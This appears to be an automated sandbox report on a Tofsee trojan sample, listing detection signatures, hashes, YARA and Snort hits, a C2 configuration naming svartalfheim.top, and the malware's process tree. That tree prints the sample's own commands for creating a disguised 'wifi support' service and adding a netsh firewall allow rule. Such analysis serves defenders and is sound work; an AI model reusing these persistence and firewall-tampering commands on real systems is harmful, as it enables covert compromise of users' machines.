
Windows Analysis Report
OcmKX57vR7

Overview

General Information

Sample Name: OcmKX57vR7 (renamed file extension from none to exe)
Analysis ID: 658475
MD5: db4d9ca855430682836db0a535e75594
SHA1: 7a9a84d79268c30b93c48f981190182197712493
SHA256: a96edd53cb70eb51f8bb9fbd0b9d0777e6b65c5203fb3b73229431b49da155e4
Tags: 32, CoinMiner, exe, trojan

Detection

Tofsee
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Tofsee
Uses netsh to modify the Windows network and firewall settings
Query firmware table information (likely to detect VMs)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign process
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Writes to foreign memory regions
Changes security center settings (notifications, updates, antivirus, firewall)
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Modifies the windows firewall
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Modifies existing windows services
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Uses SMTP (mail sending)
Found evaded block containing many API calls
Queries disk information (often used to detect virtual machines)
Contains functionality to query network adapter information

Classification

  • System is w10x64
  • OcmKX57vR7.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\OcmKX57vR7.exe" MD5: DB4D9CA855430682836DB0A535E75594)
    • cmd.exe (PID: 6440 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ghrubsm\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6488 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\pjzcupje.exe" C:\Windows\SysWOW64\ghrubsm\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 6540 cmdline: C:\Windows\System32\sc.exe" create ghrubsm binPath= "C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d\"C:\Users\user\Desktop\OcmKX57vR7.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 6636 cmdline: C:\Windows\System32\sc.exe" description ghrubsm "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 6740 cmdline: "C:\Windows\System32\sc.exe" start ghrubsm MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 6756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 6804 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • pjzcupje.exe (PID: 6792 cmdline: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe /d"C:\Users\user\Desktop\OcmKX57vR7.exe" MD5: CD1553A922DBF34673BA9D9D9A0FF5DE)
    • svchost.exe (PID: 6936 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 7012 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7048 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7124 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2560 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 2912 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5484 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6728 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6016 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5044 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6148 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6392 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4432 cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
{"C2 list": ["svartalfheim.top:443", "jo:443"]}
Source | Rule | Description | Author | Strings
0000000D.00000002.284998485.0000000000B30000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
00000000.00000003.265491962.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp | MALWARE_Win_Tofsee | Detects Tofsee | ditekSHen
  • 0xfc3e:$s1: n%systemroot%\system32\cmd.exe
  • 0xed10:$s2: loader_id
  • 0xed40:$s3: start_srv
  • 0xed70:$s4: lid_file_upd
  • 0xed64:$s5: localcfg
  • 0xf494:$s6: Incorrect respons
  • 0xf574:$s7: mx connect error
  • 0xf4f0:$s8: Error sending command (sent = %d/%d)
  • 0xf628:$s9: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp | MALWARE_Win_Tofsee | Detects Tofsee | ditekSHen
  • 0x1123e:$s1: n%systemroot%\system32\cmd.exe
  • 0x10310:$s2: loader_id
  • 0x10340:$s3: start_srv
  • 0x10370:$s4: lid_file_upd
  • 0x10364:$s5: localcfg
  • 0x10a94:$s6: Incorrect respons
  • 0x10b74:$s7: mx connect error
  • 0x10af0:$s8: Error sending command (sent = %d/%d)
  • 0x10c28:$s9: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
(12 further memory-dump matches not reproduced here)

Source | Rule | Description | Author | Strings
0.2.OcmKX57vR7.exe.400000.0.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
0.2.OcmKX57vR7.exe.400000.0.unpack | MALWARE_Win_Tofsee | Detects Tofsee | ditekSHen
  • 0xfc3e:$s1: n%systemroot%\system32\cmd.exe
  • 0xed10:$s2: loader_id
  • 0xed40:$s3: start_srv
  • 0xed70:$s4: lid_file_upd
  • 0xed64:$s5: localcfg
  • 0xf494:$s6: Incorrect respons
  • 0xf574:$s7: mx connect error
  • 0xf4f0:$s8: Error sending command (sent = %d/%d)
  • 0xf628:$s9: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
0.3.OcmKX57vR7.exe.af0000.0.unpack | MALWARE_Win_Tofsee | Detects Tofsee | ditekSHen
  • 0xe110:$s2: loader_id
  • 0xe140:$s3: start_srv
  • 0xe170:$s4: lid_file_upd
  • 0xe164:$s5: localcfg
  • 0xe894:$s6: Incorrect respons
0.2.OcmKX57vR7.exe.400000.0.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
0.2.OcmKX57vR7.exe.400000.0.raw.unpack | MALWARE_Win_Tofsee | Detects Tofsee | ditekSHen
  • 0x1123e:$s1: n%systemroot%\system32\cmd.exe
  • 0x10310:$s2: loader_id
  • 0x10340:$s3: start_srv
  • 0x10370:$s4: lid_file_upd
  • 0x10364:$s5: localcfg
  • 0x10a94:$s6: Incorrect respons
  • 0x10b74:$s7: mx connect error
  • 0x10af0:$s8: Error sending command (sent = %d/%d)
  • 0x10c28:$s9: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
(23 further unpacked-PE matches not reproduced here)
No Sigma rule has matched

Timestamp: 07/07/22-01:02:53.847400 | Source IP: 192.168.2.3 | Destination IP: 8.8.8.8 | Source Port: 54960 | Destination Port: 53 | SID: 2023883 | Protocol: UDP | Classtype: Potentially Bad Traffic
Timestamp: 07/07/22-01:02:13.617293 | Source IP: 192.168.2.3 | Destination IP: 8.8.8.8 | Source Port: 63332 | Destination Port: 53 | SID: 2023883 | Protocol: UDP | Classtype: Potentially Bad Traffic
Timestamp: 07/07/22-01:01:33.050484 | Source IP: 192.168.2.3 | Destination IP: 8.8.8.8 | Source Port: 57723 | Destination Port: 53 | SID: 2023883 | Protocol: UDP | Classtype: Potentially Bad Traffic

            AV Detection

Source: svartalfheim.top:443 | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\pjzcupje.exe | Avira: detection malicious, Label: HEUR/AGEN.1242277
Source: OcmKX57vR7.exe | Virustotal: Detection: 49%
Source: OcmKX57vR7.exe | Metadefender: Detection: 45%
Source: OcmKX57vR7.exe | ReversingLabs: Detection: 84%
Source: svartalfheim.top | Virustotal: Detection: 10%
Source: OcmKX57vR7.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\pjzcupje.exe | Joe Sandbox ML: detected
Source: 17.2.svchost.exe.2510000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 0.2.OcmKX57vR7.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 0.3.OcmKX57vR7.exe.af0000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.pjzcupje.exe.b50000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.pjzcupje.exe.b50000.2.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 0.2.OcmKX57vR7.exe.ad0e67.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.pjzcupje.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 13.2.pjzcupje.exe.b30e67.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.OcmKX57vR7.exe.400000.0.unpack | Malware Configuration Extractor: Tofsee {"C2 list": ["svartalfheim.top:443", "jo:443"]}

            Compliance

Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Unpacked PE file: 0.2.OcmKX57vR7.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe | Unpacked PE file: 13.2.pjzcupje.exe.400000.0.unpack
Source: OcmKX57vR7.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: C:\cowuyal\goseyacav56 vekahapej 67\gidexazanevo.pdb | source: OcmKX57vR7.exe, pjzcupje.exe.0.dr
Source: Binary string: [C:\cowuyal\goseyacav56 vekahapej 67\gidexazanevo.pdb | source: OcmKX57vR7.exe, pjzcupje.exe.0.dr

            Networking

Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 40.93.207.0 25
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: svartalfheim.top
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 46.173.215.82 443
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: microsoft-com.mail.protection.outlook.com
Source: Traffic | Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:57723 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:63332 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:54960 -> 8.8.8.8:53
Source: Malware configuration extractor | URLs: svartalfheim.top:443
Source: Malware configuration extractor | URLs: jo:443
Source: Joe Sandbox View | ASN Name: GARANT-PARK-INTERNETRU GARANT-PARK-INTERNETRU
Source: Joe Sandbox View | IP Address: 40.93.207.0 40.93.207.0
Source: global traffic | TCP traffic: 192.168.2.3:49744 -> 40.93.207.0:25
Source: svchost.exe, 0000001A.00000002.528990396.0000023757A8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.439059980.000001D6C5900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.528667704.00000290CD100000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 0000001A.00000002.528990396.0000023757A8B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.438828550.000001D6C50EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.401236022.000001D6C50EC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.528434490.00000290CC8DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 0000001A.00000002.528559919.00000237524A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumer
Source: svchost.exe, 00000015.00000002.318292795.000001E9FBE13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000013.00000002.528165639.000001D77D242000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000015.00000003.317741272.000001E9FBE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318344962.000001E9FBE6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000015.00000003.317808860.000001E9FBE4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.318051847.000001E9FBE50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318321603.000001E9FBE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317909344.000001E9FBE41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318321603.000001E9FBE42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317909344.000001E9FBE41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000015.00000002.318325260.000001E9FBE4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317838375.000001E9FBE49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000015.00000003.317905164.000001E9FBE45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317909344.000001E9FBE41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000015.00000003.317771744.000001E9FBE61000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000001E.00000003.411961992.000001D6C5E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411769784.000001D6C5E03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411708385.000001D6C59A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411692699.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411904227.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411724964.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411746076.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411602296.000001D6C5996000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.hotspotshield.com/
Source: svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000015.00000002.318316299.000001E9FBE3D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.318292795.000001E9FBE13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000015.00000003.317873826.000001E9FBE40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.317905164.000001E9FBE45000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000015.00000003.317932502.000001E9FBE39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000003.296122146.000001E9FBE30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000015.00000002.318292795.000001E9FBE13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/geni
Source: svchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000001E.00000003.415051605.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000001E.00000003.411961992.000001D6C5E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411769784.000001D6C5E03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411708385.000001D6C59A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411692699.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411904227.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411724964.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411746076.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411602296.000001D6C5996000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.hotspotshield.com/terms/
Source: svchost.exe, 0000001E.00000003.411961992.000001D6C5E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411769784.000001D6C5E03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411708385.000001D6C59A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411692699.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411904227.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411724964.000001D6C59B5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411746076.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.411602296.000001D6C5996000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.pango.co/privacy
Source: svchost.exe, 0000001E.00000003.419224721.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report
Source: svchost.exe, 0000001E.00000003.419259422.000001D6C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419125131.000001D6C59BA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419241431.000001D6C59A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419224721.000001D6C5993000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.419194698.000001D6C59BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknown | DNS traffic detected: queries for: microsoft-com.mail.protection.outlook.com
Source: C:\Users\user\Desktop\OcmKX57vR7.exe | Code function: 0_2_00402A62 GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,socket,htons,select,recv,htons,htons,htons,GetProcessHeap,HeapAlloc,htons,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,closesocket,GetProcessHeap,HeapFree,0_2_00402A62
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown | Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
